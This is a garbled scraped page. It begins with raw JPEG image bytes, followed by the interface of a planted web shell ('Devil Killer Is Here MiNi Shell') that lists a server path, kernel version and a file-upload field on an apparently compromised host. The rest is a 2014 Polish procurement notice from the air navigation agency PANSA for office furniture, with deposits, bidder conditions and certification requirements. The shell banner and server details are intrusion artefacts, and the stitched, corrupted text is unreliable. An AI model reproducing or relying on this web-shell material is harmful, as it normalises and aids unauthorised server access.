JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140415/128956-N-2014.html

<p class="kh_header"><b>Warszawa: Dostawa mebli biurowych dla PAŻP</b><br>
<b>Numer ogłoszenia: 128956 - 2014; data zamieszczenia: 15.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Polska Agencja Żeglugi Powietrznej , ul. Wieżowa 8, 02-147 Warszawa, woj. mazowieckie, tel. 22 574 62 44, faks 22 574 63 59.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pansa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa osoba prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli biurowych dla PAŻP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i montaż mebli biurowych wraz z wyposażeniem, zgodnie ze Szczegółowym Opisem Przedmiotu Zamówienia.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.11.11.00-4, 39.12.11.00-7, 39.13.21.00-7, 39.14.13.00-5, 39.13.10.00-9, 39.12.12.00-8, 39.11.31.00-8, 39.14.31.10-0, 39.14.10.00-2, 39.15.60.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający wymaga wniesienia wadium.
2.Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości: 
Dla zadania nr 1 - 3 000,00 PLN (słownie: trzy tysiące złotych 00/100). 
Dla zadania nr 2 - 1 400,00 PLN (słownie: jeden tysiąc czterysta złotych 00/100). 
Dla zadania nr 3 - 1 000,00 PLN (słownie: jeden tysiąc złotych 00/100). 
Dla zadania nr 4 - 180,00 PLN (słownie: sto osiemdziesiąt złotych 00/100). 
Dla zadania nr 5 - 250,00 PLN (słownie: dwieście pięćdziesiąt złotych 00/100). 
Dla zadania nr 6 - 300,00 PLN (słownie: trzysta złotych 00/100). 
Dla zadania nr 7 - 500,00 PLN (słownie: pięćset złotych 00/100). 
Dla zadania nr 8 - 1 800,00 PLN (słownie: jeden tysiąc osiemset złotych 00/100). 
3.Wadium należy wnieść w formach przewidzianych w art. 45 ust. 6 ustawy, tj. w:
3.1.pieniądzu,
3.2.poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3.3.gwarancjach bankowych (bezwarunkowych, nieodwołalnych, płatnych na pierwsze żądanie),
3.4.gwarancjach ubezpieczeniowych (bezwarunkowych, nieodwołalnych, płatnych na pierwsze żądanie),
3.5.poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000 r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r., Nr 42, poz. 275).
4.Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
5.W przypadku wadium wnoszonego w pieniądzu za termin wniesienia uznaje się chwilę uznania kwoty na rachunku Zamawiającego.
6.Wadium w pieniądzu należy wnieść na rachunek Zamawiającego: 
Bank Gospodarstwa Krajowego
Aleje Jerozolimskie 7, 00 - 955 Warszawa
nr rachunku: 03 1130 1017 0025 0094 4820 0013
7.W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w budynku Zamawiającego, al. Krakowska 4/6, 02-284 Warszawa, w kancelarii - pokój 007 lub zamieścić w osobnej kopercie - opisanej wadium - postępowanie nr AWZ-2227-9/27/2014, zadanie nr  dołączonej do oferty. W przypadku wnoszenia wadium w pozostałych dopuszczalnych formach określonych w pkt 3, beneficjentem takich dokumentów musi być Polska Agencja Żeglugi Powietrznej ul. Wieżowa 8, 02-147 Warszawa, złożone poręczenie lub gwarancja muszą zawierać w swojej treści zobowiązanie zgodne z art. 46 ust. 4a oraz ust. 5 ustawy.
8.Nie wniesienie wadium w terminie lub wniesienie w inny sposób niż określony w SIWZ, spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt. 2 ustawy, a jego oferta zostanie odrzucona na podstawie art. 24 ust. 4 ustawy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla zadania nr 1
W ramach potwierdzenia spełniania warunku Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał/wykonuje co najmniej 2 dostawy polegające na dostawie mebli biurowych o wartości nie mniejszej niż 80 000,00 PLN netto każda. 
Dla zadania nr 3
W ramach potwierdzenia spełniania warunku Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał/wykonuje co najmniej 2 dostawy polegające na dostawie mebli biurowych o wartości nie mniejszej niż 30 000,00 PLN netto każda. 
Dla zadania nr 4, 5 i 6
W ramach potwierdzenia spełniania warunku  Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał/wykonuje co najmniej 2 dostawy polegające na dostawie mebli biurowych o wartości nie mniejszej niż 5 000,00 PLN netto każda. 
Dla zadania nr 7
W ramach potwierdzenia spełniania warunku  Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał/wykonuje co najmniej 2 dostawy polegające na dostawie mebli biurowych o wartości nie mniejszej niż 15 000,00 PLN netto każda. 
W przypadku złożenia oferty na więcej niż jedno zadanie (dotyczy zadania nr 1 oraz 3-7), Zamawiający uzna warunek za spełniony, gdy Wykonawca wykaże się wykonaniem/wykonywaniem dostaw o największej wymaganej wartości spośród zadań na które składana jest oferta.
Dla zadania nr 2 i 8
W ramach potwierdzenia spełniania warunku  Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał/wykonuje co najmniej 2 dostawy polegające na dostawie foteli obrotowych o wartości nie mniejszej niż 40 000,00 PLN netto każda. 
Ocena spełniania warunków wymaganych od Wykonawców nastąpi wg formuły: spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonawca obowiązany jest w Wykazie podać informacje o:
a)	Dla zadania nr 1 - wykonanych/wykonywanych co najmniej dwóch (2) dostawach polegających na dostawie mebli biurowych o wartości nie mniejszej niż 80 000,00 PLN netto każda.
b)	Dla zadania nr 3 - wykonanych/wykonywanych co najmniej dwóch (2) dostawach polegających na dostawie mebli biurowych o wartości nie mniejszej niż 30 000,00 PLN netto każda.
c)	Dla zadania nr 4, 5 i 6 - wykonanych/wykonywanych co najmniej dwóch (2) dostawach polegających na dostawie mebli biurowych o wartości nie mniejszej niż 5 000,00 PLN netto każda.
d)	Dla zadania nr 7 - wykonanych/wykonywanych co najmniej dwóch (2) dostawach polegających na dostawie mebli biurowych o wartości nie mniejszej niż 15 000,00 PLN netto każda.
e)Dla zadania nr 2 i 8 - wykonanych/wykonywanych co najmniej dwóch (2) dostawach polegających na dostawie foteli obrotowych o wartości nie mniejszej niż 40 000,00 PLN netto każda;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Zadanie nr 1 - Dostawa mebli dla lokalizacji Warszawa
1.Atest higieniczny na płyty wiórowe melaminowane użyte do produkcji mebli, wg pozycji zamówienia: 
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,24,25,26,27
2.Atest higieniczny  na płyty wiórowe laminowane  użyte  do produkcji mebli, wg pozycji zamówienia: 23
3.Atest higieniczny na  farby proszkowe do  lakierowania stelaży, wg pozycji zamówienia: 
1,2,24,25
4.Atest lub Deklaracja producenta, ew. Oświadczenie producenta, że meble są zgodne z wymaganiami nw. norm w zakresie mebli biurowych:
4.1.PN-EN 527-2:2004  Meble biurowe - Stoły robocze i biurka - Część 2:
Mechaniczne wymagania bezpieczeństwa            
PN-EN 527-3:2004  Meble biurowe - Stoły robocze i biurka-Część 3: 
Metody oznaczania stateczności i mechanicznej wytrzymałości konstrukcji, wg pozycji  zamówienia: 1,2       
4.2.PN-EN 14073-2:2006  Meble biurowe - Meble do przechowywania - Część 2:
   Wymagania bezpieczeństwa 
PN-EN 14073-3:2006 Meble biurowe - Meble do przechowywania - Część 3: Metody badań w celu określenia stateczności i wytrzymałości konstrukcji, wg pozycji zamówienia:
3,4,5,6,7,8,9,10,11,12,13,14,15,17,18,19,20,21,22              
4.3.PN-EN 1335-1:2004 Meble biurowe- Krzesło biurowe do pracy - Część 1: Wymiary - Oznaczanie wymiarów 
PN-EN 1335 -2:2002 Meble biurowe - Krzesło biurowe do pracy - Część 2:  Wymagania bezpieczeństwa
PN-EN 1335-3:2002 Meble biurowe - Krzesło biurowe do pracy - Część 3:
Metody badania bezpieczeństwa, wg pozycji zamówienia: 32
5.Oświadczenie lub Deklaracja Producenta, że meble socjalne i nietypowe meble biurowe przeznaczone na wyposażenie miejsc pracy są wykonane, zgodnie ze sztuką meblarską i spełniają wymagania bezpieczeństwa i higieny pracy, według pozycji: 16,23,24,25,26,27,29,30,31,33.
6.Atest lub Deklaracja Zgodności lub Certyfikat  Zgodności ew. Oświadczenie producenta regałów magazynowych, że regały są zgodne z wymaganiami określonymi w polskiej normie PN-88/M78321 - Regały magazynowe wolnostojące. Jednocześnie prosimy o informację o dopuszczalnym obciążeniu regałów, wg pozycji zamówienia: 34.
7.Certyfikat ew. oświadczenie producenta, że sprzęt wykonany z aluminium jest bezpieczny do pracy na wysokości do użytku domowego i spełnia wymogi w oparciu o normę europejską EN - 131, według pozycji zamówienia: 35.
8.Certyfikat bezpieczeństwa gwarantowanego ew. oświadczenie producenta, że produkt jest bezpieczny w użytkowaniu, według pozycji zamówienia: 36.
9.Sprawozdanie z badań ew. Atest lub Deklaracja Zgodności proponowanej tapicerki w siedziskach obszytych: 
9.1.tapicerką materiałową, m.in. typu welur, mickro, wełna w zakresie: odporności na ścieranie min.30 000 cykli (suwów) metodą  Martindalea, wg pozycji zamówienia: 32 - fotele obrotowe
9.2.tkaniną materiałową w zakresie: odporności na ścieranie min. 20 000 cykli metodą Martindalea wg pozycji zamówienia: 29,30,31.
Zadanie nr 2 - Dostawa foteli obrotowych do pracy 24/7  dla lokalizacji Warszawa
1.Atest lub Deklaracja producenta, ew. Oświadczenie producenta, że meble są zgodne z wymaganiami nw. norm w zakresie mebli biurowych :     
PN-EN 1335-1:2004 Meble biurowe - Krzesło biurowe do pracy - Część 1: Wymiary - Oznaczanie wymiarów 
PN-EN 1335 -2:2002 Meble biurowe - Krzesło biurowe do pracy - Część 2:  Wymagania bezpieczeństwa
PN-EN 1335-3:2002 Meble biurowe - Krzesło biurowe do pracy - Część 3:
Metody badania bezpieczeństwa, wg pozycji zamówienia: 1.
2.Sprawozdanie z badań ew. Atest lub Deklaracja Zgodności proponowanej tapicerki w siedziskach obszytych tapicerką materiałową w zakresie:   
 odporności na ścieranie min. 50 000 cykli (suwów) metodą  Martindalea, 
 wg  pozycji zamówienia : 1- fotele obrotowe
Zadanie nr 3 - Dostawa mebli dla lokalizacji Wrocław
1.Atest higieniczny na płyty wiórowe melaminowane użyte do produkcji mebli, wg pozycji zamówienia: 
1,2,3,4,5,6,7,8,9,10,11,12,13,15,16,17,18,
2.Atest higieniczny na płyty wiórowe laminowane użyte do produkcji mebli, wg pozycji zamówienia: 
20,23,24,25,26,27,28,29,30,31
3.Atest higieniczny na  farby proszkowe do lakierowania stelaży, wg pozycji zamówienia: 
9,10,11,12,13,17,
4.Atest lub Deklaracja producenta, ew. Oświadczenie producenta, że meble są zgodne z wymaganiami nw. norm w zakresie mebli biurowych:
4.1.PN-EN 527-2:2004  Meble biurowe - Stoły robocze i biurka - Część2:
Mechaniczne wymagania bezpieczeństwa            
PN-EN 527-3:2004  Meble biurowe - Stoły robocze i biurka - Część 3: 
Metody oznaczania stateczności i mechanicznej wytrzymałości konstrukcji, wg pozycji  zamówienia:
9,10,13,       
4.2. PN-EN 14073-2:2006  Meble biurowe - Meble do przechowywania - Część 2:
Wymagania bezpieczeństwa 
PN-EN 14073-3:2006 Meble biurowe - Meble do przechowywania - Część 3: Metody badań w celu określenia stateczności i wytrzymałości konstrukcji, wg pozycji zamówienia:
2,3,4,5,6,7,8,15,           
5.Oświadczenie lub Deklaracja Producenta, że meble socjalne i nietypowe biurowe  przeznaczone na wyposażenie miejsc pracy są wykonane, zgodnie ze sztuką meblarską i spełniają wymagania bezpieczeństwa i higieny pracy, według pozycji:  1,11,12,14,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
6.Sprawozdanie z badań ew. Atest lub Deklaracja Zgodności proponowanej tapicerki w siedziskach obszytych: 
6.1.tkaniną materiałową w zakresie:
odporności na ścieranie min. 20 000 cykli metodą Martindalea wg pozycji zamówienia: 21,22
6.2.ekoskórą w zakresie:
odporności na ścieranie min. 20 000 cykli metodą Martindalea wg pozycji zamówienia: 32
Zadanie nr 4 - Dostawa mebli dla lokalizacji Gdańsk
1.Atest higieniczny  na płyty wiórowe melaminowane  użyte  do produkcji mebli, wg pozycji zamówienia: 
1,2.
2.Atest higieniczny  na płyty wiórowe laminowane  użyte  do produkcji mebli, wg pozycji zamówienia: 
3,4,5,6.      
3.Oświadczenie lub Deklaracja Producenta , że meble socjalne przeznaczone na wyposażenie miejsc pracy są wykonane, zgodnie ze sztuką meblarską i spełniają wymagania bezpieczeństwa i higieny pracy, według pozycji:  1,2,3,4,5,6.
Zadanie nr 5 - Dostawa mebli dla lokalizacji Katowice
1.Atest lub Deklaracja producenta, ew. Oświadczenie producenta, że meble są zgodne z wymaganiami nw. norm w zakresie mebli biurowych:       
PN-EN 1335-1:2004 Meble biurowe - Krzesło biurowe do pracy - Część 1: Wymiary - Oznaczanie wymiarów 
PN-EN 1335 -2:2002 Meble biurowe - Krzesło biurowe do pracy - Część 2:  Wymagania bezpieczeństwa
PN-EN 1335-3:2002 Meble biurowe - Krzesło biurowe do pracy - Część 3:
Metody badania bezpieczeństwa, wg pozycji zamówienia: 1
2.Oświadczenie lub Deklaracja Producenta, że meble socjalne przeznaczone na wyposażenie miejsc pracy są wykonane, zgodnie ze sztuką meblarską i spełniają wymagania bezpieczeństwa i higieny pracy, według pozycji:  2
3.Sprawozdanie z badań ew. Atest lub Deklaracja Zgodności proponowanej tapicerki w siedziskach obszytych: 
tapicerką materiałową, m.in. typu welur, mickro, wełna w zakresie:   
odporności na ścieranie min.30 000 cykli ( suwów ) metodą  Martindalea, 
wg  pozycji zamówienia : 1- fotele obrotowe
Zadanie nr 6 - Dostawa mebli dla lokalizacji Kraków
1.Atest higieniczny na płyty wiórowe melaminowane użyte do produkcji mebli, wg pozycji zamówienia: 2,3.
2.Oświadczenie lub Deklaracja Producenta, że meble socjalne przeznaczone na wyposażenie miejsc pracy są wykonane, zgodnie ze sztuką meblarską i spełniają wymagania bezpieczeństwa i higieny pracy, według pozycji: 
 1,2,3.
3.Sprawozdanie z badań ew. Atest lub Deklaracja Zgodności proponowanej tapicerki w siedziskach obszytych  tkaniną materiałową w zakresie:
odporności na ścieranie min. 20 000 cykli metodą Martindalea wg pozycji zamówienia: 1
4.Atest (sprawozdanie) z badań wytrzymałościowych lub Deklaracja producenta, ew. Oświadczenie producenta, że stół metalowy pod wiertarkę jest wytrzymały i bezpieczny w użytkowaniu, według pozycji: 7
Zadanie nr 7 - Dostawa mebli dla lokalizacji Łódź
Atest lub Deklaracja Zgodności lub Certyfikat  Zgodności ew. Oświadczenie producenta regałów magazynowych, że regały są zgodne z wymaganiami określonymi w polskiej normie PN-88/M78321 - Regały magazynowe wolnostojące. Jednocześnie prosimy o informację o dopuszczalnym obciążeniu regałów, wg pozycji zamówienia: 1
Zadania nr 8 - Dostawa foteli na potrzeby rozbudowy platformy testowej P_21
1.Atest lub Deklaracja producenta, ew. Oświadczenie producenta, że meble są zgodne z wymaganiami nw. norm w zakresie mebli biurowych :
PN-EN 1335-1:2004 Meble biurowe - Krzesło biurowe do pracy - Część 1: Wymiary - Oznaczanie wymiarów 
PN-EN 1335 -2:2002 Meble biurowe - Krzesło biurowe do pracy - Część 2:  Wymagania bezpieczeństwa
PN-EN 1335-3:2002 Meble biurowe - Krzesło biurowe do pracy - Część 3:
Metody badania bezpieczeństwa 
2.Sprawozdanie z badań ew. Atest lub Deklaracja Zgodności proponowanej tapicerki w siedziskach obszytych: 
tapicerką materiałową, m.in. typu welur, mickro, wełna w zakresie:   
odporności na ścieranie min. 30 000 cykli (suwów) metodą  Martindalea</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień przyszłej umowy w stosunku do treści oferty, gdy konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w szczególności gdy:
1.nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym w szczególności zmiana stawki podatku VAT; 
2.zaistnieją zdarzenia o charakterze siły wyższej, niezależne od stron umowy, które uniemożliwiłyby terminowe wykonanie zobowiązań. Strony zobowiązują się do ustalenia odpowiednio zmienionego terminu wykonania Przedmiotu Umowy. 
3.nastąpiła zmiana podwykonawcy na podwykonawcę, który wykaże się spełnianiem warunków, które pierwotnie zostały nałożone przez Zamawiającego na Wykonawcę w tej części spełniania warunków udziału w postępowaniu;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pansa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Budynek Polskiej Agencji Żeglugi Powietrznej, 02-284 Warszawa, al. Krakowska 4/6 pok. 213.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2014 godzina 11:00, miejsce: Budynek Polskiej Agencji Żeglugi Powietrznej, 02-284 Warszawa, al. Krakowska 4/6, Kancelaria pok. 007.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




